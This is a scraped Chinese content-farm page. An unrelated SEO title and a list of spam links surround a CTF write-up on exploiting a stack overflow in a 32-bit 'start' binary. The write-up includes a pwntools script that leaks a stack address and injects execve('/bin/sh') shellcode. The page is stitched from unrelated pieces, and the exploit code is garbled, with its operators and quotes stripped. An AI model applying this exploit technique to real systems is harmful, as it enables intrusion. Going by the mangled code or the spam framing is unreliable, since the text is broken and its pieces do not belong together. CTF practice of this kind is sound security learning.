当前位置: 首页 > news >正文

做微信小程序网站wordpress图片编辑插件下载

做微信小程序网站,wordpress图片编辑插件下载,wordpress网站响应速度插件,漳州seo搜索引擎优化多少钱查看保护#xff1a; 32位程序保护全没开#xff0c;黑盒测试下效果#xff1a; 存在栈溢出#xff0c;那么这题的想法就是直接ret2shellcode了。IDA中看看具体流程#xff1a; 出奇的少#xff0c;这题不能看反汇编的代码#xff0c;直接去看汇编#xff1a; 主要就2个…查看保护 32位程序保护全没开黑盒测试下效果 存在栈溢出那么这题的想法就是直接ret2shellcode了。IDA中看看具体流程 出奇的少这题不能看反汇编的代码直接去看汇编 主要就2个功能通过系统调用来执行读写功能将字符串Lets start the CTF:输出然后接收用户输入。我们看到注释下标注了长度为0x14。也就是我们能刚好覆盖到返回地址但是我的shellcode有0x18个字节。根本不够执行完全部而且目前没有有用的信息来让我ret2stack。因此我们要去调试看看能不能利用什么信息 我们观察在代码的最开始会将一个esp压入栈中紧接着栈的布局将变成如此: 5个a是我输入的测试数据。ecx将和esp将指向用户输入数据的起始位置。此时esp要索引到返回地址将直接执行add esp,14h。执行完后esp将指向旧的esp 而且我们惊奇的发现这两个值相差0x4因此我们需要通过write函数将他泄露出来紧着这我们的返回地址就有了步骤shellocode就是要返回到布局的栈地址处执行。原理我讲明白了直接上exp from pwn import * context.log_level debug context.arch i386io process(./start) #io remote(node5.buuoj.cn,28971) gdb.attach(io) io.recv() mov_ecx_esp 0x8048087 payload1 ba*0x14 p32(mov_ecx_esp) io.send(payload1)leak_stack_addr u32(io.recv(4)) cur_esp leak_stack_addr0x14 print(hex(leak_stack_addr)) payload2 ba*0x14 p32(cur_esp) shellcode xor eax,eax xor edx,edx push edx push 0x68732f2f push 0x6e69622f mov ebx,esp xor ecx,ecx mov al,0xb int 0x80 shellcodeasm(shellcode)print(len(shellcode)) payload2 shellcode io.send(payload2) pause() #gdb.attach(io) io.interactive()
http://www.zqtcl.cn/news/574629/

相关文章:

  • 即墨网站建设招聘企业类网站有哪些
  • 汕头网站建设开发软件开发属于哪个专业
  • 企业网站建设规划书阿里云虚拟机怎么做多个网站
  • 营销平台网站建设做视频怎么做
  • 吉林房地产网站开发icp网站授权函
  • 深圳公司网站建设哪家好郑州短视频培训机构
  • 网络培训班答案百度seo收录软件
  • 中核工建设集团有限公司网站网站建设管理中se是什么意思
  • 网站如何做关键词引流网站怎么快速做收录
  • 网站建设文案网站设计要学哪些
  • 品牌网站建设gs平台搭建工具
  • 怎么把自己做的网站弄到域名上柳州游戏网站建设
  • 做衣服类网站策划书高端建设网站企业
  • 珠海网站建设公司有哪些代替做网站推广
  • 泰安的网站建设公司旅游网站建设规划报告怎么写
  • 如何建设淘宝客网站什么是网络营销常用的网络营销方法有哪些
  • 大连华南网站建设深圳网站建设公司的外文名是
  • 做招投标网站云南昆明网站建设价格
  • 越秀区网站建设公司微网站菜单
  • vs2017网站开发广州网站建设易得
  • 长沙企业网站建设价格陕西省门户网站建设政策
  • 龙华营销型网站制作wordpress最近评论
  • 嘉兴微信网站做一个招聘信息的网站_用什么做网站的软件
  • 各种购物网站大全上海市建设工程检测网
  • 网站推广沈阳php网站开发接口开发
  • 莱芜 做网站 公司官网开发
  • tomcat做网站做自媒体查找素材的网站
  • 信阳建设企业网站公司软件开发平台公司
  • 营销型网站建设营销型设计家官网视频
  • 部门网站建设目的加猛挣钱免费做网站软件